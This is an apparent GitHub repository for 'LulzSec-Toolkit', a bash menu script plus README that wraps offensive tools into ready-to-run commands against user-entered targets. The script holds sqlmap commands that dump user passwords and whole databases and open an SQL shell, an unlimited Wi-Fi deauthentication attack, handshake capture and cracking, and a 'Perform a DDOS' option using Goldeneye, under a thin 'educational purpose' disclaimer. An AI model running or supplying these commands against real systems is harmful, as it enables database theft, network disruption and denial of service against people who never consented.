├── LulzSec.sh ├── README.md └── Screenshots ├── LulzSec-Toolkit1.jpg └── LulzSec-Toolkit2.jpg /LulzSec.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # etc etc etc 3 | # .................. 4 | [[ `id -u` -eq 0 ]] || { echo -e "\e[31mMust be root to run script"; exit 1; } 5 | resize -s 30 60 6 | clear # Clear the screen. 7 | SERVICE=service; 8 | 9 | if ps ax | grep -v grep | grep metasploit > /dev/null 10 | then 11 | echo "$SERVICE service running" 12 | else 13 | echo "$Starting service." 14 | 15 | fi 16 | clear 17 | clear 18 | echo -e 19 | echo -e 20 | echo -e "\E[1;31m . /%% /%% /%%%%%% " 21 | echo -e "\E[1;31m .| %% | %% /%%__ %% " 22 | echo -e "\E[1;31m .| %% /%% /%%| %% /%%%%%%%%| %% \__/ /%%%%%% /%%%%%%% " 23 | echo -e "\E[1;31m .| %% | %% | %%| %%|____ /%%/| %%%%%% /%%__ %% /%%_____/ " 24 | echo -e "\E[1;31m .| %% | %% | %%| %% /%%%%/ \____ %%| %%%%%%%%| %% " 25 | echo -e "\E[1;31m .| %% | %% | %%| %% /%%__/ /%% \ %%| %%_____/| %% " 26 | echo -e "\E[1;31m .| %%%%%%%%| %%%%%%/| %% /%%%%%%%%| %%%%%%/| %%%%%%%| %%%%%%% " 27 | echo -e "\E[1;31m .|________/ \______/ |__/|________/ \______/ \_______/ \_______/ " 28 | echo -e "\E[1;31m TOOLKIT TOOLKIT TOOLKIT TOOLKIT TOOLKIT TOOLKIT TOOLKIT TOOLKIT " 29 | echo -e 30 | echo -e 31 | echo -e "\E[1;31m ______________________________ " 32 | echo -e "\E[1;31m | | " 33 | echo -e "\E[1;31m | BY: SecExploiter | " 34 | echo -e "\E[1;31m | | " 35 | echo -e "\E[1;31m | \e[33mONLY FOR EDUCATIONAL PURPOSE \E[1;31m| " 36 | echo -e "\E[1;31m |______________________________| " 37 | echo -e "\E[1;31m " 38 | echo -e "\E[1;31m " 39 | 40 | read -p "Press [Enter] key to Continue......." 41 | clear 42 | echo -e "\E[1;31m%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% " 43 | echo -e "\E[1;31m% % " 44 | echo -e "\E[1;31m% . /%% /%% /%%%%%% % " 45 | echo -e "\E[1;31m% .| %% | %% /%%__ %% % " 46 | echo -e "\E[1;31m% .| %% /%% /%%| %% /%%%%%%%%| %% \__/ /%%%%%% /%%%%%%% % " 47 | echo -e "\E[1;31m% .| %% | %% | %%| %%|____ /%%/| %%%%%% /%%__ %% /%%_____/ % " 48 | echo -e "\E[1;31m% .| %% | %% | %%| %% /%%%%/ \____ %%| %%%%%%%%| %% % " 49 | echo -e "\E[1;31m% .| %% | %% | %%| %% /%%__/ /%% \ %%| %%_____/| %% % " 50 | echo -e "\E[1;31m% .| %%%%%%%%| %%%%%%/| %% /%%%%%%%%| %%%%%%/| %%%%%%%| %%%%%%% % " 51 | echo -e "\E[1;31m% .|________/ \______/ |__/|________/ \______/ \_______/ \_______/ % " 52 | echo -e "\E[1;31m% TOOLKIT TOOLKIT TOOLKIT TOOLKIT TOOLKIT TOOLKIT TOOLKIT TOOLKIT % " 53 | echo -e "\E[1;31m% % " 54 | echo -e "\E[1;31m% % " 55 | echo -e "\E[1;31m% __ % " 56 | echo -e "\E[1;31m% )| ________________________.------,_ _ #SecExploiter % " 57 | echo -e "\E[1;31m% _/o|_____/ ,____________.__;__,__,__,__,_Y...:::---===----// #SecExploiter % " 58 | echo -e "\E[1;31m% |==========\ ; ; ; ; ; \__,__\__,_____ --__,-.\ OFF (( #SecExploiter % " 59 | echo -e "\E[1;31m% ----------|__,__/__,__/__/ \\~(\\ -\ THE \\ #SecExploiter % " 60 | echo -e "\E[1;31m% \ ==== \ \\--\\ \_______\\ #SecExploiter % " 61 | echo -e "\E[1;31m% | === | \\--\\ #SecExploiter % " 62 | echo -e "\E[1;31m% | === | ( --- ) % " 63 | echo -e "\E[1;31m% / ==== / |=====| % " 64 | echo -e "\E[1;31m% |______| % " 65 | echo -e "\E[1;31m% % " 66 | echo -e "\E[1;31m% % " 67 | echo -e "\E[1;31m%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% " 68 | echo -e "\e[31m%-------------------------[ \e[97mSELECT AN OPTION TO BEGIN \E[1;31m]-------------------------% " 69 | echo -e "\E[1;31m%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% " 70 | echo -e "% % " 71 | echo -e "\e[31m%%%\e[33m[x] \e[33mInstall \e[33m [Install necessary Tools]\E[1;31m % " 72 | echo -e "\e[31m%%%[1] \e[31mScanning \e[31m [Go into Nmap Menu]\E[1;31m %" 73 | echo -e "\e[31m%%%[2] \e[31mExploit \e[31m [Go into Metasploit Menu]\E[1;31m % " 74 | echo -e "\e[31m%%%[3] \e[31mSql-Injection \e[31m [Go into Sqlmap Menu]\E[1;31m % " 75 | echo -e "\e[31m%%%[4] \e[31mWifi-Cracking \e[31m [Go into Aircrack-ng Menu]\E[1;31m % " 76 | echo -e "\e[31m%%%[5] \e[31mPassword-Cracking \e[31m [Go into Hashcat Menu]\E[1;31m % " 77 | echo -e "\e[31m%%%[6] \e[31mDDOS \e[31m [Go into Goldeneye Menu]\E[1;31m % " 78 | echo -e "% % " 79 | echo -e "\e[31m%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\e[31m% " 80 | echo -e "\e[31mOption:" 81 | tput sgr0 82 | read options 83 | 84 | case "$options" in 85 | # Note variable is quoted. 86 | 87 | "x" | "x" ) 88 | # Accept upper or lowercase input. 89 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mInstall Menu \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 90 | 91 | PS3='Enter your choice 7=Quit: ' 92 | options=("Install Nmap" 93 | "Install Metasploit" 94 | "Install Sqlmap" 95 | "Install Aircrack-ng" 96 | "Install Hashcat" 97 | "Install Goldeneye" 98 | "Quit") 99 | select opt in "${options[@]}" 100 | do 101 | case $opt in 102 | "Install Nmap") 103 | sudo apt-get install nmap 104 | ;; 105 | "Install Metasploit") 106 | sudo apt-get install msfconsole 107 | ;; 108 | "Install Sqlmap") 109 | sudo apt-get install sqlmap 110 | ;; 111 | "Install Aircrack-ng") 112 | sudo apt-get install aircrack-ng 113 | ;; 114 | "Install Hashcat") 115 | sudo apt-get install hashcat 116 | ;; 117 | "Install Goldeneye") 118 | sudo apt-get install goldeneye 119 | ;; 120 | "Quit") 121 | echo "Good Bye" && break 122 | ;; 123 | *) echo invalid option;; 124 | esac 125 | done 126 | ;; 127 | 128 | 129 | "1" | "1" ) 130 | # Accept upper or lowercase input. 131 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mNmap Menu \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 132 | 133 | PS3='Enter your choice 8=Quit: ' 134 | options=("Nmap all Options" 135 | "Scan all Ports" 136 | "Scan specific Ports" 137 | "Scan for Vulnerabilities" 138 | "Search for Devices" 139 | "Show Traceroute" 140 | "Scan for Service/Version" 141 | "Quit") 142 | select opt in "${options[@]}" 143 | do 144 | case $opt in 145 | "Nmap all Options") 146 | nmap 147 | ;; 148 | "Scan all Ports") 149 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mStart scanning \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 150 | read -p 'IP/URL: ' uservar 151 | nmap $uservar 152 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mFinished scanned \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 153 | ;; 154 | "Scan specific Ports") 155 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mStart scanning \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 156 | read -p 'IP/URL: ' uservar; read -p 'PORT: ' userport 157 | nmap $uservar -p$userport 158 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mFinished scanned \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 159 | ;; 160 | "Scan for Vulnerabilities") 161 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mStart scanning \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 162 | read -p 'IP/URL: ' uservar 163 | nmap --script vuln $uservar 164 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mFinished scanned \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 165 | ;; 166 | "Search for Devices") 167 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mStart scanning \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 168 | read -p 'IP: ' uservar 169 | nmap -T5 $uservar/24 170 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mFinished scanned \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 171 | ;; 172 | "Show Traceroute") 173 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mStart scanning \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 174 | read -p 'IP/URL: ' uservar 175 | sudo nmap -sn -Pn --traceroute $uservar 176 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mFinished scanned \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 177 | ;; 178 | "Scan for Service/Version") 179 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mStart scanning \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 180 | read -p 'IP/URL: ' uservar 181 | nmap -sV $uservar 182 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mFinished scanned \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 183 | ;; 184 | "Quit") 185 | echo "Good Bye" && break 186 | ;; 187 | *) echo invalid option;; 188 | esac 189 | done 190 | ;; 191 | 192 | "2" | "2" ) 193 | # Accept upper or lowercase input. 194 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mStarting Metasploit \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 195 | msfconsole 196 | use exploit/multi/handler 197 | 198 | ;; 199 | 200 | 201 | 202 | "3" | "3" ) 203 | # Accept upper or lowercase input. 204 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mSqlmap Menu \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 205 | 206 | PS3='Enter your choice 11=Quit: ' 207 | options=( "Sqlmap all Options" 208 | "Show User and Password" 209 | "Show Database" 210 | "Show Tables" 211 | "Show Columns" 212 | "Dump Files" 213 | "Dump whole Database" 214 | "Level (1-5) and Risk (1-3)" 215 | "Privileges" 216 | "Sql-Shell" 217 | "Quit") 218 | select opt in "${options[@]}" 219 | do 220 | case $opt in 221 | "Sqlmap all Options") 222 | sqlmap -hh 223 | ;; 224 | "Show User and Password") 225 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mStart scanning \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 226 | read -p 'URL: ' uservar 227 | sqlmap -u $uservar --threads 10 --users --passwords 228 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mFinished scanned \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 229 | ;; 230 | "Show Database") 231 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mStart scanning \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 232 | read -p 'URL: ' uservar 233 | sqlmap -u $uservar --threads 10 --dbs 234 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mFinished scanned \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 235 | ;; 236 | "Show Tables") 237 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mStart scanning \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 238 | read -p 'URL: ' uservar; read -p 'Database: ' userport 239 | sqlmap -u $uservar -D $userport --threads 10 --tables 240 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mFinished scanned \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 241 | ;; 242 | "Show Columns") 243 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mStart scanning \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 244 | read -p 'URL: ' uservar; read -p 'Database: ' userport; read -p 'Tables: ' userid 245 | sqlmap -u $uservar -D $userport -T $userid --threads 10 --columns 246 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mFinished scanned \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 247 | ;; 248 | "Dump Files") 249 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mStart scanning \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 250 | read -p 'URL: ' uservar; read -p 'Database: ' userport; read -p 'Tables: ' userid; read -p 'Columns: ' usercol 251 | sqlmap -u $uservar -D $userport -T $userid -C $usercol --threads 10 --dump 252 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mFinished scanned \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 253 | ;; 254 | "Dump whole Database") 255 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mStart scanning \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 256 | read -p 'URL: ' uservar; read -p 'Database to dump: ' userport 257 | sqlmap -u $uservar -D $userport --threads 10 --dump-all 258 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mFinished scanned \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 259 | ;; 260 | "Level (1-5) and Risk (1-3)") 261 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mStart scanning \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 262 | read -p 'URL: ' uservar; read -p 'Level (1-5): ' userport; read -p 'Risk (1-3): ' userid 263 | sqlmap -u $uservar -threads 10 --level $userport --risk $userid 264 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mFinished scanned \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 265 | ;; 266 | "Privileges") 267 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mStart scanning \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 268 | read -p 'URL: ' uservar 269 | sqlmap -u $uservar --threads 10 --privileges 270 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mFinished scanned \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 271 | ;; 272 | "Sql-Shell") 273 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mStart scanning \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 274 | read -p 'URL: ' uservar 275 | sqlmap -u $uservar --sql-shell 276 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mFinished scanned \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 277 | ;; 278 | "Quit") 279 | echo "Good Bye" && break 280 | ;; 281 | *) echo invalid option;; 282 | esac 283 | done 284 | 285 | ;; 286 | 287 | "4" | "4" ) 288 | # Accept upper or lowercase input. 289 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mAircrack-ng Menu \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 290 | 291 | PS3='Enter your choice 11=Quit: ' 292 | options=("Aircrack-ng all Options" 293 | "Iwconfig" 294 | "Start Airmon-ng" 295 | "Iwconfig" 296 | "Start Airodump-ng" 297 | "Airodump-ng Options" 298 | "Start Aireplay-ng" 299 | "Stop Airmon-ng" 300 | "Iwconfig" 301 | "Crack with Aircrack-ng" 302 | "Quit") 303 | select opt in "${options[@]}" 304 | do 305 | case $opt in 306 | "Aircrack-ng all Options") 307 | aircrack-ng 308 | ;; 309 | "Iwconfig") 310 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mStart \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 311 | iwconfig 312 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mFinished \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 313 | ;; 314 | "Start Airmon-ng") 315 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mStart \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 316 | read -p 'INTERFACE: ' uservar 317 | sudo airmon-ng start $uservar 318 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mFinished \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 319 | ;; 320 | "Iwconfig") 321 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mStart \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 322 | iwconfig 323 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mFinished \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 324 | ;; 325 | "Start Airodump-ng") 326 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mStart \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 327 | sudo airodump-ng wlp2s0mon 328 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mFinished \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 329 | ;; 330 | "Airodump-ng Options") 331 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mStart \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 332 | read -p 'CHANNEL: ' uservar; read -p 'FILE-NAME: ' userport; read -p 'BSSID: ' userid 333 | sudo airodump-ng -c $uservar -w $userport -d $userid wlp2s0mon 334 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mFinished \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 335 | ;; 336 | "Start Aireplay-ng") 337 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mStart \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 338 | read -p 'BSSID: ' uservar; read -p 'STATION: ' userport 339 | sudo aireplay-ng --deauth 0 -a $uservar -c $userport wlp2s0mon 340 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mFinished \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 341 | ;; 342 | "Stop Airmon-ng") 343 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mStart \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 344 | sudo airmon-ng stop wlp2s0mon 345 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mFinished \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 346 | ;; 347 | "Iwconfig") 348 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mStart \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 349 | iwconfig 350 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mFinished \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 351 | ;; 352 | "Crack with Aircrack-ng") 353 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mStart \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 354 | read -p 'FILE-NAME: ' uservar; read -p 'DIRECTORY: ' userport 355 | sudo aircrack-ng $uservar -w $userport 356 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mFinished \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 357 | ;; 358 | "Quit") 359 | echo "Good Bye" && break 360 | ;; 361 | *) echo invalid option;; 362 | esac 363 | done 364 | 365 | ;; 366 | 367 | 368 | "5" | "5" ) 369 | # Accept upper or lowercase input. 370 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mStarting Hashcat \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 371 | hashcat --help 372 | 373 | ;; 374 | 375 | "6" | "6" ) 376 | # Accept upper or lowercase input. 377 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mGoldeneye Menu \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 378 | 379 | PS3='Enter your choice 3=Quit: ' 380 | options=("Goldeneye all Options" 381 | "Perform a DDOS" 382 | "Quit") 383 | select opt in "${options[@]}" 384 | do 385 | case $opt in 386 | "Goldeneye all Options") 387 | goldeneye 388 | ;; 389 | "Perform a DDOS") 390 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mStart \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 391 | read -p 'URL: ' userurl; read -p 'Workers (default: 10): ' uservar; read -p 'Sockets (default: 500): ' userport; read -p 'Method get/post/random (default: get): ' userid 392 | goldeneye $userurl -w $uservar -s $userport -m $userid 393 | echo -e "\E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \e[97mFinished \E[1;31m!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" 394 | ;; 395 | "Quit") 396 | echo "Good Bye" && break 397 | ;; 398 | *) echo invalid option;; 399 | esac 400 | done 401 | 402 | ;; 403 | 404 | 405 | * ) 406 | # Default option. 407 | # 408 | echo 409 | echo "Invalid Option." 410 | ;; 411 | 412 | esac 413 | 414 | tput sgr0 # Reset colors to "normal." 415 | 416 | echo 417 | 418 | exit 0 419 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # LulzSec-Toolkit 2 | 3 | ## What is LulzSec-Toolkit ? 4 | LulzSec-Toolkit enables the user to have a menu with the most important tools. But this tool not only allows you to have the most important tools but also to have the most important commands of each tool so that it is easier for the user. 5 | 6 | ![LulzSec1](https://user-images.githubusercontent.com/62266784/85389654-02f36600-b548-11ea-99de-711020f337f2.jpg) 7 | 8 | ## Supported platforms 9 | 10 | #### ---> Linux 11 | #### ---> Mac OS 12 | #### ---> Windows 13 | 14 | ![LulzSec](https://user-images.githubusercontent.com/62266784/85389665-0686ed00-b548-11ea-8b45-d16b0f0e71f0.jpg) 15 | 16 | ## The Goal 17 | #### • Only best tools with best commands 18 | #### • Easy to operate 19 | #### • Good for ethical hacking and penetration testing 20 | #### • Step by step to crack Wifi with Aircrack-ng 21 | #### • Tools can be installed in the script 22 | 23 | ## Installation 24 | 1. git clone https://github.com/SecExploiter/LulzSec-Toolkit.git 25 | 2. cd LulzSec-Toolkit 26 | 3. chmod +x LulzSec.sh 27 | 4. sudo ./LulzSec.sh 28 | 29 | ## Disclaimer 30 | Usage of LulzSec-Toolkit for attacking and 31 | scanning targets without prior mutual consent 32 | is illegal. It is the end users responsibility to obey 33 | all applicable local, state and federal laws. Developers assume no 34 | liability and are not responsible for any misuse or damage caused by this program. 35 | 36 | ## SUPPORT US 37 | ### Our Account https://github.com/SecExploiter 38 | # If you liked this tool then recommend it to other people and let's have a star there!!!!!!! 39 | -------------------------------------------------------------------------------- /Screenshots/LulzSec-Toolkit1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Tobias-Marcotto/LulzSec-Toolkit/57a243121047f82552c88c6e7b3e247f91555d4e/Screenshots/LulzSec-Toolkit1.jpg -------------------------------------------------------------------------------- /Screenshots/LulzSec-Toolkit2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Tobias-Marcotto/LulzSec-Toolkit/57a243121047f82552c88c6e7b3e247f91555d4e/Screenshots/LulzSec-Toolkit2.jpg --------------------------------------------------------------------------------